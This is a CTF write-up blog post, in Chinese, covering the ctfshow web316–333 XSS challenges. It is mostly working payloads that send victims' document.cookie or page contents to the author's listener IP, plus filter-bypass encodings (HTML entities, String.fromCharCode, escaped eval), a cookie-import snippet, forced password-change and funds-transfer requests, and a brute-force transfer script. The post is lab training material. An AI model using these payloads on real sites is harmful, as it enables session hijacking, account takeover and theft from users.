【ctfshow】web篇-XSS wp

前言

记录web的题目wp,慢慢变强,铸剑。

XSS

web316

什么是xss?

1、跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。

2、通过 document.cookie 盗取 cookie中的信息
使用 js或 css破坏页面正常的结构与样式
流量劫持(通过访问某段具有 window.location.href 定位到其他页面)
dos攻击:利用合理的客户端请求来占用过多的服务器资源,从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码,从而拒绝合理的请求服务。
利用 iframe、frame、XMLHttpRequest或上述 Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作,并且攻击者还可以利用 iframe,frame进一步的进行 CSRF 攻击。
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。

XSS的分类

1、 反射型:
一般来说这种类型的XSS,需要攻击者提前构造一个恶意链接,来诱使客户点击,比如这样的一段链接:www.abc.com/?params=`x`

2、存储型:
这种类型的XSS,危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码,并且服务器没有正确进行过滤输出,那就会造成浏览这个页面的用户执行这段JavaScript代码。

3、DOM型:
这种类型则是利用非法输入来闭合对应的html标签。
比如,有这样的一个a标签:
乍看问题不大,可是当$var的内容变为 ’ οnclick=’alert(/xss/) //,这段代码就会被执行。

先找一个xs平台来进行中介,xss平台导航注册一个号,然后点击创建项目,名字随意,默认模块,随便一个代码

image-20210806070019689

在输入框提交就可以拿到flag了

image-20210806070255810

xss平台刷新一下

image-20210806070405375

  • 但是如果你有服务器就会简单很多,直接在服务器上python -m http.server 39543监听这个端口
1
<script>location.href="http://ip:39543/"+document.cookie</script>

image-20210807134630245

web317

  • 过滤了script,用img代码
1
<img src='' onerror=location.href='http://118.195.161.220:39543/'+document.cookie>

image-20210807135139852

web318

  • 过滤img,用xss平台的实体十六进制编码
1
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;=&#x22;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3A;//&#x78;&#x73;&#x73;&#x2E;&#x70;&#x74;/&#x65;&#x4B;&#x63;&#x5A;&#x22;&#x3E;&#x3C;/&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E;>
  • 继续用服务器抓iframe
1
<iframe onload=document.location='http://118.195.161.220:39543/?cookie='+document.cookie>

image-20210807135508552

web319

  • iframe继续撸,不过换种写法
1
<iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

image-20210807135916013

web320

  • 过滤了空格可以换%09制表符或者/来代替

image-20210806161325778

可以利用String.fromCharCode来进行转换

1
<body/onload=document.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,47,47,120,115,46,115,98,47,49,66,113,117,62,60,47,115,67,114,73,112,84,62));>
  • iframe没过滤继续用,用/来代替空格
1
<iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

image-20210807140014892

web321

  • 过滤了逗号,我换了个10进制实体
1
<iframe	WIDTH=0	HEIGHT=0	srcdoc=。。。。。。。。。。&#60;&#115;&#67;&#82;&#105;&#80;&#116;&#32;&#115;&#82;&#67;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#46;&#115;&#98;&#47;&#49;&#66;&#113;&#117;&#34;&#62;&#60;&#47;&#115;&#67;&#114;&#73;&#112;&#84;&#62;>

image-20210806102726430

  • 或者换一种,用String.fromCharCode拼接<script>alert(1)</script>
1
document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));document.write(String.fromCharCode(97));document.write(String.fromCharCode(108));document.write(String.fromCharCode(101));document.write(String.fromCharCode(114));document.write(String.fromCharCode(116));document.write(String.fromCharCode(40));document.write(String.fromCharCode(49));document.write(String.fromCharCode(41));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));

写一个脚本跑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/7
# blog: gylq.gitee.io
a= "<sCRiPt sRC=//xs.sb/1Bqu></sCrIpT>"

res_ord=''
res = ''

for i in a:
tmp = ord(i)
res_ord = str(tmp)
payload="document.write(String.fromCharCode({}));".format(res_ord)
print(payload,end="")

image-20210806191419032

1
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
  • 服务器payload,继续iframe
1
<iframe/onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>

web322

  • 还是转实体
1
<iframe	WIDTH=0	HEIGHT=0	srcdoc=。。。。。。。。。。&#60;&#115;&#67;&#82;&#105;&#80;&#116;&#32;&#115;&#82;&#67;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#46;&#115;&#98;&#47;&#49;&#66;&#113;&#117;&#34;&#62;&#60;&#47;&#115;&#67;&#114;&#73;&#112;&#84;&#62;>
  • 或者上面那个方法
1
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
  • 服务器形式,和上题一样

web323

  • 过滤iframe
1
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
  • 过滤了iframe那就换svg
1
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

image-20210807140735006

web324

1
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>

服务器

1
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

web325

服务器

1
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

好像上个用不了了,那就把转换成native编码或者js转义的base 16进制编码,我写了两种

js转义的base 16进制编码 注意:简单方法,先转换为URL编码然后文本编辑器替换%为\x

1
eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x36\x30\x2C\x31\x31\x35\x2C\x36\x37\x2C\x38\x32\x2C\x31\x30\x35\x2C\x38\x30\x2C\x31\x31\x36\x2C\x33\x32\x2C\x31\x31\x35\x2C\x38\x32\x2C\x36\x37\x2C\x36\x31\x2C\x34\x37\x2C\x34\x37\x2C\x31\x32\x30\x2C\x31\x31\x35\x2C\x34\x36\x2C\x31\x31\x35\x2C\x39\x38\x2C\x34\x37\x2C\x34\x39\x2C\x36\x36\x2C\x31\x31\x33\x2C\x31\x31\x37\x2C\x36\x32\x2C\x36\x30\x2C\x34\x37\x2C\x31\x31\x35\x2C\x36\x37\x2C\x31\x31\x34\x2C\x37\x33\x2C\x31\x31\x32\x2C\x38\x34\x2C\x36\x32\x29\x29\x3B")

还有native编码

1
eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")

paylaod

1
<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>

web326

服务器

1
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

xss平台

1
<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>

web327

收件人为admin,这次换个写法

1
<body onload=window.open('http://118.195.161.220:39543/'+document.cookie)>

image-20210807141507613

web328

继续服务器监听

1
<script>window.open('http://118.195.161.220:39543/'+document.cookie)</script>

浏览器console一键设置cookie

1
2
3
4
var cookiestr="你的打到的cookie内容";var arr = cookiestr.split(";");
for(var i in arr){
document.cookie=arr[i];
}

web329

  • 这次cookie不持久,所以就直接获取页面信息,通过document来获取
1
<script>window.open('http://118.195.161.220:39543/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

web330

  • 多了个修改密码功能
1
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>

admin 123456登陆

web331

  • 换成了post请求,用ajax发送请求
1
<script>$.ajax({url:"api/change.php",method:"POST",data:{'p':'1234567'}})</script>

web332

1
<script>$.ajax({url: "http://127.0.0.1/api/amount.php",method: "POST",data: {'u'='gylq','a':10000},cache: false,success: function(res){}});</script>

向admin转-10000

web333

  • burp抓包跑一波,为了练习一下python,写个脚本跑,两个,非预期和预期解
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/7
# blog: gylq.gitee.io
import requests
url = "http://d69814f3-233e-41dc-b8e0-5cb7ffbc711d.challenge.ctf.show:8080/api/amount.php"
headers ={'Cookie':'PHPSESSID=q3crvj696jaorhq25sktu88l3j'} #登陆后的sessionid
for i in range(0,10000):
tmp=i*4
data = {
'u': 'admin123',
'a': str(tmp)
}
res=requests.post(url,data=data,headers=headers)
1
<script>$.ajax({url:'api/amount.php',type:'POST',data:{'u':'gylq','a':'10000'}})</script>

本文标题:【ctfshow】web篇-XSS wp

文章作者:孤桜懶契

发布时间:2021年08月09日 - 07:20:50

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/71.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------